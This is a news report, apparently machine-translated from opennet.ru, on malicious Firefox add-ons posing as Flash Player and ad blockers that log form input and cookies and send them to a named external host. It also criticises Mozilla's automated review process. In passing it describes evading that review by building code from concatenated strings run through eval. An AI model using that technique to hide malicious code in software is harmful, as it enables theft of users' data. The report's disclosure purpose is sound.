Firefox add-ons directory () mass publication of malicious add-ons hiding behind well-known projects. For example, the directory contains malicious add-ons "Adobe Flash Player", "ublock origin Pro", "Adblock Flash Player", etc.
As such add-ons are removed from the catalog, attackers immediately create a new account and re-host their add-ons. For example, an account was created a few hours ago , under which the add-ons "Youtube Adblock", "Ublock plus", "Adblock Plus 2019" are placed. Apparently, the description for add-ons is formed to ensure their output in the top for search queries "Adobe Flash Player" and "Adobe Flash".
When installed, add-ons ask for permissions to access all the data of the sites you browse. In the course of work, a keylogger is launched, which transmits to the theridgeatdanbury.com host information about filling out forms and the Cookies that are set. Add-on installation file names are "adpbe_flash_player-*.xpi" or "player_downloader-*.xpi". The script code inside the add-ons is slightly different, but the malicious actions they perform are obvious and not hidden.
Probably, the absence of the use of techniques for hiding malicious activity and the extremely simple code make it possible to bypass the automated preliminary review system for add-ons. At the same time, it is not clear how the fact of explicit and non-hidden sending of data from the add-on to an external host was ignored during the automated check.
Recall that, according to Mozilla, the introduction of digital signature verification will block the spread of malicious and spying add-ons for users. Some plugin developers with this position and believe that the mechanism of mandatory verification by digital signature only creates difficulties for developers and leads to an increase in the time it takes to bring corrective releases to users, without affecting security in any way. There are many trivial and obvious to bypass the system of automated checks for additions that allow you to silently insert malicious code, for example, through the formation of an operation on the fly by concatenating several lines with the subsequent execution of the resulting line by calling eval. Mozilla's position to the fact that most authors of malicious add-ons are lazy and will not resort to such techniques to hide malicious activity.
In October 2017, the AMO catalog included new process for reviewing additions. Manual verification has been replaced by an automated process that eliminates long queues for verification and increases the speed of delivery of new releases to users. At the same time, manual verification is not completely abolished, but is selectively carried out for already placed add-ons. Additions for manual testing are selected based on calculated risk factors.
Source: opennet.ru